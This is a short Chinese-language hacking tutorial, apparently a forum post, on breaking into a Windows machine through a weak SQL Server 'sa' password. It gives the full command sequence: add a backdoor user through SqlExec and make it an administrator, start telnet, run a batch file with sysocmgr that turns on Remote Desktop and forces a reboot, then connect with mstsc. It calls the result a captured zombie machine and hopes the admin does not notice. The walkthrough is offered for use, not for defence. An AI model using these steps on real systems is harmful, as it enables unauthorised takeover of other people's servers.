早就想写一下从SA到3389的方法，一直没有时间，现在有时间了，简单说说过程

1你已经扫到SA弱口令（这个就不用我教了吧，扫描软件很多）

2使用SqlExec连接工具，连接成功后，使用如下命令

net user hejiudeyu /add
net user hejiudeyu good
net localgroup administrators hejiudeyu /add

命令的说明：第1行，添加hejiudeyu用户，

第2行，把hejiudeyu的密码设置成good。

第3行，把hejiudeyu用户提升到管理组。

3利用net start telnet命令开启telnet服务。

（这里涉及到NTLM验证，如果不明白，请看我以前的菜鸟之总结解决NTLM验证的方法，这篇文章）

4 telnet到对方的机器，见个批处理文件3389（有人已经总结了开3389的5种方法）

具体的命令如下：
C:/>copy con 3389.bat
echo [components] > c:/sql
echo TSEnable = on >> c:/sql
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/sql /q
用ctrl+Z结束，然后运行这个批处理文件
等一会，机器就重起了，如果在重起过程中没有被管理员发现，恭喜你，你应该获得了1台肉鸡。

5用mstsc（工具）连接